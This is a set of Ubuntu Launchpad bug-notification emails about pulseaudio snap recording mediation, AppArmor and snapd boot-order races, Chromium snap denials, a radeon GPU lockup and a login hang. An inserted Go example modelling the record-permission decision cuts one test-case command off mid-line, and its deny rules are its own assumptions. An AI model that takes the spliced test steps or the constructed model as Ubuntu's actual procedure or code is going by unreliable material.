Status in pulseaudio source package in Xenial: Fix Committed
Status in pulseaudio source package in Bionic: Fix Committed

Bug description:

[Impact]

Ubuntu 16.10 added rudimentary snap support to disable audio recording if the connecting process was a snap. By Ubuntu 18.04, something changed in the build resulting in 'Enable Snappy support: no' with audio recording no longer being mediated by pulseaudio (access to the pulseaudio socket continued to be mediated by snapd's apparmor policy). This resulted in any application with the pulseaudio interface connected to be able to also record. Ubuntu 16.04 never had mediation patches and always allowed recording when the pulseaudio interface was connected.

To correct this situation but not regress existing behavior, Ubuntu 19.04's pulseaudio was updated patch to allow playback to all connected clients (snaps or not), record by classic snaps (see bug 1787324) and record by strict mode snaps if either the pulseaudio or new-in-snapd-2.41 audio-record interfaces were connected. With this change, snapd is in a position to migrate snaps to the new audio-playback and audio-record interfaces and properly mediate audio recording (see https://forum.snapcraft.io/t/upcoming-pulseaudio-interface-deprecation/13418).

The patch to pulseaudio consists of adding a module, enabling it in default.pa and then when it is enabled, pulseaudio when faced with a record operation will, when the connecting process is a snap (ie, its security label (ie, apparmor label) starts with 'snap.'), query snapd via its control socket to ask if the snap is classic and if not, whether the pulseaudio or audio-record interfaces are connected. Adjusting pulseaudio in the manner does not require coordination with any release of snapd. It does need a newer version of snapd-glib, which was recently updated to 1.49 in the last SRU.

[Test Case]

IMPORTANT: if updating pulseaudio while the session is running, either need to reboot for the test or kill pulseaudio so it can restart with the new snap policy

For unconfined applications:

$ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes"
yes
$ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording
^Cyes
$ paplay /tmp/out.wav && echo "yes"
yes

For confined, non-snap applications:

$ sudo apt-get install evince
$ aa-exec -p /usr/bin/evince -- paplay /usr/share/sounds/alsa/Noise.wav && echo yes
$ rm -f /tmp/out.wav ; aa-exec -p /usr/bin/evince -- parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording
^Cyes
$ aa-exec -p /usr/bin/evince -- paplay /tmp/out.wav && echo "yes"
yes

For classic snaps:

$ sudo snap install test-snapd-classic-confinement --classic
$ snap run --shell test-snapd-classic-confinement
$ cat /proc/self/attr/current # verify we are classic confined
snap.test-snapd-classic-confinement.test-snapd-classic-confinement (complain)
$ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes"
yes
$ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording
^Cyes
$ paplay /tmp/out.wav && echo "yes"
yes
$ exit # out of snap run --shell

For strict snaps with pulseaudio:

$ sudo snap install test-snapd-pulseaudio --edge
$ sudo snap connect test-snapd-pulseaudio:pulseaudio
$ snap connections test-snapd-pulseaudio
Interface   Plug                              Slot         Notes
pulseaudio  test-snapd-pulseaudio:pulseaudio  :pulseaudio  -
$ test-snapd-pulseaudio.play --help # ensure SNAP dirs are created
...
$ sudo cp /usr/share/sounds/alsa/Noise.wav /var/snap/test-snapd-pulseaudio/common/
$ test-snapd-pulseaudio.play /var/snap/test-snapd-pulseaudio/common/Noise.wav && echo yes
xcb_connection_has_error() returned true
yes

(note, the xcb_connection_has_error() message is due to the x11 interface not being connected which is unrelated to mediation. x11 is left out to ensure that just audio-playback/audio-record are tested)

$ test-snapd-pulseaudio.record /tmp/out.wav && echo yes # should pass
...
^Cyes
$ test-snapd-pulseaudio.play /tmp/out.wav && echo yes
...
yes

For strict snaps with audio-playback/audio-record:

$ sudo snap refresh core --candidate # make sure have 2.41. 'install' on 16.04
$ sudo snap install
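The record decision described in the [Impact] section of bug 1781428, modelled as an added example; this is not the pulseaudio module's code or snapd's. The `snapInfo` type, the `fakeSnapd` lookup, the labels for the strict snaps and the choice to deny when the label is malformed or the lookup fails are assumptions of the example.

```go
package main

import (
	"errors"
	"fmt"
	"strings"
)

// snapInfo is a hypothetical stand-in for what snapd reports about one snap.
type snapInfo struct {
	classic   bool
	connected []string // interfaces whose plug is connected
}

// snapdLookup stands in for the query sent over snapd's control socket.
type snapdLookup func(snapName string) (snapInfo, error)

// snapFromLabel reports whether an AppArmor label belongs to a snap and, if
// so, which one. Snap labels look like "snap.<snap>.<app>", optionally
// followed by the profile mode, e.g. " (complain)".
func snapFromLabel(label string) (name string, isSnap bool, err error) {
	label = strings.TrimSpace(label)
	if i := strings.LastIndex(label, " ("); i >= 0 && strings.HasSuffix(label, ")") {
		label = label[:i] // drop the trailing mode
	}
	if !strings.HasPrefix(label, "snap.") {
		return "", false, nil
	}
	rest := strings.TrimPrefix(label, "snap.")
	dot := strings.Index(rest, ".")
	if dot <= 0 { // no app part, or empty snap name
		return "", true, fmt.Errorf("malformed snap label %q", label)
	}
	return rest[:dot], true, nil
}

// mayRecord applies the policy from the bug description to one client.
// Playback is allowed for every connected client and is not modelled here.
func mayRecord(label string, lookup snapdLookup) (bool, string) {
	name, isSnap, err := snapFromLabel(label)
	if !isSnap {
		return true, "not a snap"
	}
	if err != nil {
		return false, err.Error() // assumption: deny on a malformed label
	}
	info, err := lookup(name)
	if err != nil {
		return false, "snapd lookup failed: " + err.Error() // assumption: deny
	}
	if info.classic {
		return true, "classic snap"
	}
	for _, iface := range info.connected {
		if iface == "pulseaudio" || iface == "audio-record" {
			return true, "strict snap with " + iface + " connected"
		}
	}
	return false, "strict snap without pulseaudio or audio-record connected"
}

// fakeSnapd is constructed sample state using the snap names from the test
// case: one classic snap, one with pulseaudio connected, one with playback only.
func fakeSnapd(name string) (snapInfo, error) {
	state := map[string]snapInfo{
		"test-snapd-classic-confinement": {classic: true},
		"test-snapd-pulseaudio":          {connected: []string{"pulseaudio"}},
		"test-snapd-audio-record":        {connected: []string{"audio-playback"}},
	}
	info, ok := state[name]
	if !ok {
		return snapInfo{}, errors.New("snap not found")
	}
	return info, nil
}

func main() {
	labels := []string{ // constructed, except the classic label from the page
		"unconfined",
		"/usr/bin/evince (enforce)",
		"snap.test-snapd-classic-confinement.test-snapd-classic-confinement (complain)",
		"snap.test-snapd-pulseaudio.record (enforce)",
		"snap.test-snapd-audio-record.record (enforce)",
		"snap.not-installed.app (enforce)",
	}
	for _, l := range labels {
		ok, why := mayRecord(l, fakeSnapd)
		fmt.Printf("record=%-5v %-50s %s\n", ok, l, why)
	}
}
```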
[Desktop-packages] [Bug 1781428] Re: please enable snap mediation support
I confirmed that https://people.canonical.com/~ubuntu-archive/proposed-migration/bionic/update_excuses.html shows no autopkgtest regression for bionic. I also ran through the TEST CASE for this bug and bionic passed. Marking verification-done-bionic.

** Tags removed: verification-failed verification-failed-bionic
** Tags added: verification-done-bionic
** Tags added: verification-done

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to pulseaudio in Ubuntu.
https://bugs.launchpad.net/bugs/1781428

Title: please enable snap mediation support

Status in pulseaudio package in Ubuntu: Fix Released
Status in pulseaudio source package in Xenial: Fix Committed
Status in pulseaudio source package in Bionic: Fix Committed
[Desktop-packages] [Bug 1781428] Re: please enable snap mediation support
** Description changed: [Impact] Ubuntu 16.10 added rudimentary snap support to disable audio recording if the connecting process was a snap. By Ubuntu 18.04, something changed in the build resulting in 'Enable Snappy support: no' with audio recording no longer being mediated by pulseaudio (access to the pulseaudio socket continued to be mediated by snapd's apparmor policy). This resulted in any application with the pulseaudio interface connected to be able to also record. Ubuntu 16.04 never had mediation patches and always allowed recording when the pulseaudio interface was connected. To correct this situation but not regress existing behavior, Ubuntu 19.04's pulseaudio was updated patch to allow playback to all connected clients (snaps or not), record by classic snaps (see bug 1787324) and record by strict mode snaps if either the pulseaudio or new-in- snapd-2.41 audio-record interfaces were connected. With this change, snapd is in a position to migrate snaps to the new audio-playback and audio-record interfaces and properly mediate audio recording (see https://forum.snapcraft.io/t/upcoming-pulseaudio-interface- deprecation/13418). The patch to pulseaudio consists of adding a module, enabling it in default.pa and then when it is enabled, pulseaudio when faced with a record operation will, when the connecting process is a snap (ie, its security label (ie, apparmor label) starts with 'snap.'), query snapd via its control socket to ask if the snap is classic and if not, whether the pulseaudio or audio-record interfaces are connected. Adjusting pulseaudio in the manner does not require coordination with any release of snapd. It does need a newer version of snapd-glib, which was recently updated to 1.49 in the last SRU. 
[Test Case] IMPORTANT: if updating pulseaudio while the session is running, either need to reboot for the test or kill pulseaudio so it can restart with the new snap policy For unconfined applications: $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes" yes $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ paplay /tmp/out.wav && echo "yes" yes For confined, non-snap applications: $ sudo apt-get install evince $ aa-exec -p /usr/bin/evince -- paplay /usr/share/sounds/alsa/Noise.wav && echo yes $ rm -f /tmp/out.wav ; aa-exec -p /usr/bin/evince -- parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ aa-exec -p /usr/bin/evince -- paplay /tmp/out.wav && echo "yes" yes For classic snaps: $ sudo snap install test-snapd-classic-confinement --classic $ snap run --shell test-snapd-classic-confinement $ cat /proc/self/attr/current # verify we are classic confined snap.test-snapd-classic-confinement.test-snapd-classic-confinement (complain) $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes" yes $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ paplay /tmp/out.wav && echo "yes" yes $ exit # out of snap run --shell For strict snaps with pulseaudio: $ sudo snap install test-snapd-pulseaudio --edge + $ sudo snap connect test-snapd-pulseaudio:pulseaudio $ snap connections test-snapd-pulseaudio Interface Plug Slot Notes pulseaudio test-snapd-pulseaudio:pulseaudio :pulseaudio - $ test-snapd-pulseaudio.play --help # ensure SNAP dirs are created ... $ sudo cp /usr/share/sounds/alsa/Noise.wav /var/snap/test-snapd- pulseaudio/common/ $ test-snapd-pulseaudio.play /var/snap/test-snapd-pulseaudio/common/Noise.wav && echo yes xcb_connection_has_error() returned true yes (note, the xcb_connection_has_error() message is due to the x11 - interface not being connecting which is unrelated to mediation. x11 is + interface not being connected which is unrelated to mediation. 
x11 is left out to ensure that just audio-playback/audio-record are tested) $ test-snapd-pulseaudio.record /tmp/out.wav && echo yes # should pass ... ^Cyes $ test-snapd-pulseaudio.play /tmp/out.wav && echo yes ... yes For strict snaps with audio-playback/audio-record: $ sudo snap refresh core --candidate # make sure have 2.41. 'install' on 16.04 $ sudo snap install test-snapd-audio-record --edge $ snap connections test-snapd-audio-record # record not connected Interface PlugSlot Notes audio-playback test-snapd-audio-record:audio-playback :audio-playback - audio-recordtest-snapd-audio-record:audio-record-- $ test-snapd-audio-record.play --help # ensure SNAP dirs are created ... $ sudo cp /usr/share/sounds/alsa/Noise.wav /var/snap/test-snapd-audio- record/common/ $ test-snapd-audio-record.play /var/snap/test-snapd-audio-record/common/Noise.wav &&
[Desktop-packages] [Bug 1871148] Re: services start before apparmor profiles are loaded
Adding a snapd Ubuntu task, marking as In Progress and assigning to mvo since he is preparing a 20.04 upload.

** Also affects: snapd (Ubuntu)
   Importance: Undecided
   Status: New

** Changed in: snapd (Ubuntu Focal)
   Assignee: (unassigned) => Michael Vogt (mvo)

** Changed in: snapd (Ubuntu Focal)
   Status: New => In Progress

** Changed in: snapd (Ubuntu Focal)
   Importance: Undecided => High

** Changed in: snapd (Ubuntu Focal)
   Milestone: None => ubuntu-20.04

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to zsys in Ubuntu.
https://bugs.launchpad.net/bugs/1871148

Title: services start before apparmor profiles are loaded

Status in AppArmor: Invalid
Status in snapd: Fix Released
Status in apparmor package in Ubuntu: Fix Released
Status in snapd package in Ubuntu: In Progress
Status in zsys package in Ubuntu: Invalid
Status in apparmor source package in Focal: Fix Released
Status in snapd source package in Focal: In Progress
Status in zsys source package in Focal: Invalid

Bug description:

Per discussion with Zyga in #snapd on Freenode, I have hit a race condition where services are being started by the system before apparmor has been started. I have a complete log of my system showing the effect somewhere within at https://paste.ubuntu.com/p/Jyx6gfFc3q/.

Restarting apparmor using `sudo systemctl restart apparmor` is enough to bring installed snaps back to full functionality.

Previously, when running any snap I would receive the following in the terminal:

---
cannot change profile for the next exec call: No such file or directory
snap-update-ns failed with code 1: File exists
---

Updated to add for Jamie:

$ snap version
snap    2.44.2+20.04
snapd   2.44.2+20.04
series  16
ubuntu  20.04
kernel  5.4.0-21-generic

To manage notifications about this bug go to:
https://bugs.launchpad.net/apparmor/+bug/1871148/+subscriptions

--
Mailing list: https://launchpad.net/~desktop-packages
Post to : desktop-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~desktop-packages
More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1871148] Re: services start before apparmor profiles are loaded
Daniel, this is a different cause but same result:

zfs-load-module.service (2ms)
zfs-import-cache.service (8ms)
zfs-import.target
...
var-lib.mount (69ms)
...
snap-multipass-1869.mount (1.358s)
...
apparmor.service (279ms)
...

In this case, apparmor correctly waited for var.lib.mount, but multipass started before apparmor.service completed.

** Also affects: snapd
   Importance: Undecided
   Status: New

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to zsys in Ubuntu.
https://bugs.launchpad.net/bugs/1871148

Title: services start before apparmor profiles are loaded

Status in AppArmor: Invalid
Status in snapd: New
Status in apparmor package in Ubuntu: Fix Released
Status in zsys package in Ubuntu: Invalid
Status in apparmor source package in Focal: Fix Released
Status in zsys source package in Focal: Invalid
[Desktop-packages] [Bug 1871148] Re: services start before apparmor profiles are loaded
Daniel responded on irc and said after several reboots with the new apparmor, everything was fine on every boot (though his critical-chain has var.lib.mount listed). My attached systemd-analyze plot svg shows that apparmor.service is indeed starting after var.lib.mount on the VM where the critical-chain didn't show it or zfs. On irc Didier thought that critical-chain would only list the longest path to apparmor.service starting and may not show everything (the man page isn't clear on this point IMHO).

Based on all of this, I'm going to tentatively mark the zsys task back to Invalid. If people continue to see this bug, we can reopen as necessary (in which case it might be a systemd task for not generating the mount units/requires/after correctly/in a race-free manner or it might indicate zfs initialization is perhaps slow and apparmor.service is starting before var.lib.mount is generated (and therefore RequiresMountsFor is satisfied. Or it is something else ;)

** Changed in: zsys (Ubuntu Focal)
   Status: New => Invalid

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to zsys in Ubuntu.
https://bugs.launchpad.net/bugs/1871148

Title: services start before apparmor profiles are loaded

Status in AppArmor: Invalid
Status in apparmor package in Ubuntu: Fix Released
Status in zsys package in Ubuntu: Invalid
Status in apparmor source package in Focal: Fix Released
Status in zsys source package in Focal: Invalid
[Desktop-packages] [Bug 1871148] Re: services start before apparmor profiles are loaded
All that said, Daniel and Jean-Baptiste, I installed 20.04 in a vm and tried to reproduce this and could not. The apparmor change was about correctness of the unit so I performed the upload, but I also hoped that it would address the issue you are seeing. I'm not certain it will.

On one boot, prior to upgrading apparmor, I saw:

$ sudo systemd-analyze critical-chain apparmor.service
The time when unit became active or started is printed after the "@" character.
The time the unit took to start is printed after the "+" character.

apparmor.service +11.135s
└─local-fs.target @4.376s
  └─zfs-mount.service @4.327s +48ms
    └─var-lib-dpkg.mount @4.188s +137ms
      └─var-lib.mount @3.883s +250ms
        └─zfs-import.target @3.829s
          └─zfs-import-cache.service @3.125s +704ms
            └─zfs-load-module.service @3.121s +2ms
              └─systemd-udev-settle.service @1.183s +1.937s
                └─systemd-udev-trigger.service @933ms +248ms
                  └─systemd-udevd-kernel.socket @886ms
                    └─system.slice @535ms
                      └─-.slice @535ms

Note that var-lib.mount is already listed. On reboot though (without updating apparmor), I see:

$ sudo systemd-analyze critical-chain apparmor.service
The time when unit became active or started is printed after the "@" character.
The time the unit took to start is printed after the "+" character.

apparmor.service +101ms
└─local-fs.target @2.812s
  └─run-user-122.mount @5.172s
    └─swap.target @1.823s
      └─dev-disk-by\x2duuid-f5ea22a0\x2de078\x2d4d8e\x2d9412\x2d1fad2171a080.swap @1.799s +22ms
        └─dev-disk-by\x2duuid-f5ea22a0\x2de078\x2d4d8e\x2d9412\x2d1fad2171a080.device @1.798s

Oddly, no zfs entries are listed apparently because local-fs.target isn't pulling them in:

$ sudo systemd-analyze critical-chain local-fs.target
The time when unit became active or started is printed after the "@" character.
The time the unit took to start is printed after the "+" character.

local-fs.target @2.812s
└─run-user-122.mount @5.172s
  └─swap.target @1.823s
    └─dev-disk-by\x2duuid-f5ea22a0\x2de078\x2d4d8e\x2d9412\x2d1fad2171a080.swap @1.799s +22ms
      └─dev-disk-by\x2duuid-f5ea22a0\x2de078\x2d4d8e\x2d9412\x2d1fad2171a080.device @1.798s

Looking at var-lib.mount, I see zfs is in there:

$ sudo systemd-analyze critical-chain var-lib.mount
The time when unit became active or started is printed after the "@" character.
The time the unit took to start is printed after the "+" character.

var-lib.mount +179ms
└─zfs-import.target @2.248s
  └─zfs-import-cache.service @1.845s +402ms
    └─zfs-load-module.service @1.840s +2ms
      └─systemd-udev-settle.service @692ms +1.143s
        └─systemd-udev-trigger.service @524ms +167ms
          └─systemd-udevd-kernel.socket @494ms
            └─system.slice @357ms
              └─-.slice @357ms

So why after a reboot did the dependencies change and drop the /var/lib entry from local-fs.target?

I then upgraded apparmor to have the RequiresMountsFor /var/lib/snapd/apparmor/profiles, rebooted and saw no difference:

$ sudo systemd-analyze critical-chain apparmor.service
The time when unit became active or started is printed after the "@" character.
The time the unit took to start is printed after the "+" character.

apparmor.service +222ms
└─local-fs.target @2.562s
  └─run-user-122.mount @4.834s
    └─swap.target @1.687s
      └─dev-disk-by\x2duuid-f5ea22a0\x2de078\x2d4d8e\x2d9412\x2d1fad2171a080.swap @1.663s +24ms
        └─dev-disk-by\x2duuid-f5ea22a0\x2de078\x2d4d8e\x2d9412\x2d1fad2171a080.device @1.662s

** Changed in: zsys (Ubuntu Focal)
   Status: Invalid => New

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to zsys in Ubuntu.
https://bugs.launchpad.net/bugs/1871148

Title: services start before apparmor profiles are loaded

Status in AppArmor: Invalid
Status in apparmor package in Ubuntu: Fix Released
Status in zsys package in Ubuntu: New
Status in apparmor source package in Focal: Fix Released
Status in zsys source package in Focal: New
[Desktop-packages] [Bug 1848919] Re: [snap] Permission denied on Private encrypted folder
** Changed in: snapd
   Status: In Progress => Fix Released

** Changed in: snapd (Ubuntu)
   Status: Triaged => Fix Released

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to chromium-browser in Ubuntu.
https://bugs.launchpad.net/bugs/1848919

Title: [snap] Permission denied on Private encrypted folder

Status in AppArmor: Fix Released
Status in snapd: Fix Released
Status in apparmor package in Ubuntu: In Progress
Status in chromium-browser package in Ubuntu: Invalid
Status in snapd package in Ubuntu: Fix Released

Bug description:

When accessing the Private (/home/username/Private, Encrypted Directory) folder (e.g. via "Link save as...") it shows "Could not read contents of Private, Error opening directory ...: Permission denied"

Package: chromium-browser
Version: 77.0.3865.120-0ubuntu1~snap1

To manage notifications about this bug go to:
https://bugs.launchpad.net/apparmor/+bug/1848919/+subscriptions

--
Mailing list: https://launchpad.net/~desktop-packages
Post to : desktop-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~desktop-packages
More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1848919] Re: [snap] Permission denied on Private encrypted folder
** Changed in: apparmor
   Status: In Progress => Fix Released

** Also affects: apparmor (Ubuntu)
   Importance: Undecided
   Status: New

** Changed in: apparmor (Ubuntu)
   Importance: Undecided => Medium

** Changed in: apparmor (Ubuntu)
   Status: New => In Progress

** Changed in: apparmor (Ubuntu)
   Assignee: (unassigned) => Jamie Strandboge (jdstrand)

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to chromium-browser in Ubuntu.
https://bugs.launchpad.net/bugs/1848919

Title: [snap] Permission denied on Private encrypted folder

Status in AppArmor: Fix Released
Status in snapd: In Progress
Status in apparmor package in Ubuntu: In Progress
Status in chromium-browser package in Ubuntu: Invalid
Status in snapd package in Ubuntu: Triaged
[Desktop-packages] [Bug 1871148] Re: services start before apparmor profiles are loaded
Reassigning the snapd task to apparmor in Ubuntu since it has a patch to rc.apparmor.functions to look for /var/lib/snapd/apparmor/profiles but does not add it to RequiresMountsFor.

** Project changed: snapd => apparmor

** Changed in: apparmor
   Status: Confirmed => In Progress

** Changed in: apparmor
   Importance: Critical => Undecided

** Changed in: apparmor
   Status: In Progress => Invalid

** Also affects: apparmor (Ubuntu)
   Importance: Undecided
   Status: New

** Changed in: apparmor (Ubuntu Focal)
   Status: New => In Progress

** Changed in: apparmor (Ubuntu Focal)
   Importance: Undecided => Critical

** Changed in: apparmor (Ubuntu Focal)
   Assignee: (unassigned) => Jamie Strandboge (jdstrand)

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to zsys in Ubuntu.
https://bugs.launchpad.net/bugs/1871148

Title: services start before apparmor profiles are loaded

Status in AppArmor: Invalid
Status in apparmor package in Ubuntu: In Progress
Status in zsys package in Ubuntu: Confirmed
Status in apparmor source package in Focal: In Progress
Status in zsys source package in Focal: Confirmed
[Desktop-packages] [Bug 1863390] Re: GPU lockup ring 0 stalled for more than X msec
After happening every day for a week, this hasn't happened again since I logged this bug. I also disabled Firefox WebRender so maybe that was a contributor. I'll re-open if I can provide any useful data. ** Changed in: xserver-xorg-video-ati (Ubuntu) Status: New => Incomplete -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to xserver-xorg-video-ati in Ubuntu. https://bugs.launchpad.net/bugs/1863390 Title: GPU lockup ring 0 stalled for more than X msec Status in xserver-xorg-video-ati package in Ubuntu: Incomplete Bug description: Since the update: xserver-xorg-video-ati-hwe-18.04 (1:19.0.1-1ubuntu1~18.04.1) bionic; which resulted from: https://bugs.launchpad.net/fedora/+source/xserver-xorg-video-ati/+bug/1841718 I've experienced GPU freezes where all video becomes unresponsive, both Xorg and Ctrl+Alt terminal switching, and the GPU fan goes to full. I am still able to access the system via SSH. Sometimes dmesg ends up full of this message repeating over and over: radeon :01:00.0: ring 0 stalled for more than 24040msec radeon :01:00.0: GPU lockup (current fence id 0x9e44 last fence id 0x9e49 on ring 0) I sometimes get a few GPU soft reset which seem to fail in drm(?): radeon :01:00.0: Saved 110839 dwords of commands on ring 0. radeon :01:00.0: GPU softreset: 0x0008 ... radeon :01:00.0: Wait for MC idle timedout ! radeon :01:00.0: Wait for MC idle timedout ! [drm] PCIE GART of 1024M enabled (table at 0x00162000).
radeon :01:00.0: WB enabled radeon :01:00.0: fence driver on ring 0 use gpu addr 0x4c00 and cpu addr 0x725651ad radeon :01:00.0: fence driver on ring 3 use gpu addr 0x4c0c and cpu addr 0xc3678ed8 radeon :01:00.0: fence driver on ring 5 use gpu addr 0x00072118 and cpu addr 0xdbd9e01b [drm:r600_ring_test [radeon]] *ERROR* radeon: ring 0 test failed (scratch(0x8504)=0xCAFEDEAD) [drm:evergreen_resume [radeon]] *ERROR* evergreen startup failed on resume Even if the above reset doesn't happen, this freeze always results in a unable to handle page fault" BUG in radeon_ring_backup, entered from various call paths, eg: BUG: unable to handle page fault for address: bc2d80574ffc ... Oops: [#1] SMP PTI CPU: 2 PID: 11243 Comm: kworker/2:1H Not tainted 5.5.0-050500-generic #202001262030 Workqueue: radeon-crtc radeon_flip_work_func [radeon] RIP: 0010:radeon_ring_backup+0xc9/0x140 [radeon] Call Trace: radeon_gpu_reset+0xc3/0x2f0 [radeon] radeon_flip_work_func+0x1f3/0x250 [radeon] ? __schedule+0x2e0/0x760 process_one_work+0x1b5/0x370 worker_thread+0x50/0x3d0 kthread+0x104/0x140 ? process_one_work+0x370/0x370 ? kthread_park+0x90/0x90 ret_from_fork+0x35/0x40 or: BUG: unable to handle page fault for address: c03901000ffc ... Oops: [#1] SMP PTI CPU: 3 PID: 2227 Comm: compton Not tainted 5.3.0-28-generic #30~18.04.1-Ubuntu RIP: 0010:radeon_ring_backup+0xd3/0x140 [radeon] Call Trace: radeon_gpu_reset+0xb9/0x340 [radeon] ? dma_fence_wait_timeout+0x48/0x110 ? reservation_object_wait_timeout_rcu+0x19d/0x340 radeon_gem_handle_lockup.part.4+0xe/0x20 [radeon] radeon_gem_wait_idle_ioctl+0xa6/0x110 [radeon] ? radeon_gem_busy_ioctl+0x80/0x80 [radeon] drm_ioctl_kernel+0xb0/0x100 [drm] drm_ioctl+0x389/0x450 [drm] ? radeon_gem_busy_ioctl+0x80/0x80 [radeon] ? __switch_to_asm+0x40/0x70 ? __switch_to_asm+0x34/0x70 ? __switch_to_asm+0x40/0x70 ? __switch_to_asm+0x40/0x70 ? __switch_to_asm+0x34/0x70 ? __switch_to_asm+0x40/0x70 ? __switch_to_asm+0x34/0x70 ? 
__switch_to_asm+0x40/0x70 radeon_drm_ioctl+0x4f/0x80 [radeon] do_vfs_ioctl+0xa9/0x640 ? __schedule+0x2b0/0x670 ksys_ioctl+0x75/0x80 __x64_sys_ioctl+0x1a/0x20 do_syscall_64+0x5a/0x130 entry_SYSCALL_64_after_hwframe+0x44/0xa9 I've tried both 5.3.0-28-generic and 5.5.0-050500-generic from kernel-ppa but that made no difference. It appears to be a bug in radeon. Nothing specific makes this happen, just regular usage with a compositing window manager. I'm not playing games or particularly exercising the GPU. The last two times I was just reading in web browser. It's also happened in the middle of the night while I was asleep. Sometimes I have a few days uptime, sometimes it happens in less than 24 hours from boot. This never happened before the radeon update mentioned on the first line. I'll attach two files of dmesg output. As per https://wiki.ubuntu.com/X/Troubleshooting/Freeze I've installed and started apport for next time it happens. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/xserver-xorg-video-ati/+bug/1863390/+subscriptions --
[Desktop-packages] [Bug 1285444] Re: Login Successful, Desktop Never Loads
I'm not 100% sure it's the same issue but there are many similarities to the original issue. My issue only happens after I try to wake the laptop from sleep. What I've been encountering: 1. Boot computer, boot proceeds normally, can log-in, all is good. 2. Suspend laptop 3. On wake, just see the pink "Ubuntu 19.10" background. Cursor works and can be moved around, can click on upper right tool bar menu (with battery/wifi/etc) but nothing else seems to work if I click on items. Looks like wifi connection is successful. 4. Switching TTY with ctrl+alt+F1 works and then a normal login screen appears where I can successfully log in. 5. Sometimes (but not always) I'm prompted for password saying, "Authentication required to refresh system repositories". I'm happy to open up a new bug if that makes more sense and these issues are unrelated. -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to at-spi2-core in Ubuntu. https://bugs.launchpad.net/bugs/1285444 Title: Login Successful, Desktop Never Loads Status in at-spi2-core package in Ubuntu: Triaged Bug description: Here is what I encounter 1. Boot computer, boot proceeds normally 2. Reach standard Ubuntu login screen, nothing seems to be amiss 3. Enter user name and password 4. Login disappears, just see the pink "Ubuntu 14.04" background The desktop never loads, not even after ~30 minutes. The launcher never appears, and the Desktop background never changes to the user-configured background. Other features: * Cursor works fine, it can be moved around the screen * No error messages pop up * ALT+F1 etc.
can be used to switch to different TTYs; all files on the system appear to be intact * Print screen button works (I will upload a screen shot when I get a chance to copy it onto a USB drive) * Hitting power button pops up a window prompting the user to decide whether to shut down * CTRL+ALT+DELETE prompts the user to log out * Desktop does not load on any user accounts, including the guest account To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/at-spi2-core/+bug/1285444/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1864127] Re: apparmor denies ~/snap/chromium/ writes
Seth, I suspect if you stop the snap and restart it, these errors will go away. -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to chromium-browser in Ubuntu. https://bugs.launchpad.net/bugs/1864127 Title: apparmor denies ~/snap/chromium/ writes Status in chromium-browser package in Ubuntu: New Bug description: Hello, on focal with chromium from the snap package running I see a constant stream of apparmor denials: Feb 21 00:20:55 millbarge audit[4014267]: AVC apparmor="DENIED" operation="open" profile="snap.chromium.chromium" name=2F686F6D652F7361726E6F6C642F736E61702F6368726F6D69756D2F313032362F2E636F6E6669672F6368726F6D69756D2F44656661756C742F53796E6320446174612F53796E63446174612E73716C697465332D6A6F75726E616C pid=4014267 comm="Chrome_SyncThre" requested_mask="wc" denied_mask="wc" fsuid=1000 ouid=1000 Feb 21 00:20:55 millbarge audit[4014267]: SYSCALL arch=c03e syscall=257 success=no exit=-13 a0=ff9c a1=7f4318004cce a2=80042 a3=180 items=2 ppid=4014264 pid=4014267 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=(none) ses=1 comm="Chrome_SyncThre" exe="/snap/chromium/1026/usr/lib/chromium-browser/chrome" key="access" Feb 21 00:20:55 millbarge audit: CWD cwd="/home/sarnold" Feb 21 00:20:55 millbarge audit: PATH item=0 name=2F686F6D652F7361726E6F6C642F736E61702F6368726F6D69756D2F313032362F2E636F6E6669672F6368726F6D69756D2F44656661756C742F53796E6320446174612F inode=4782436 dev=00:3d mode=040700 ouid=1000 ogid=1000 rdev=00:00 nametype=PARENT cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0 Feb 21 00:20:55 millbarge audit: PATH item=1 name=2F686F6D652F7361726E6F6C642F736E61702F6368726F6D69756D2F313032362F2E636F6E6669672F6368726F6D69756D2F44656661756C742F53796E6320446174612F53796E63446174612E73716C697465332D6A6F75726E616C inode=4890128 dev=00:3d mode=0100600 ouid=1000 ogid=1000 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0 cap_frootid=0 Feb 21 
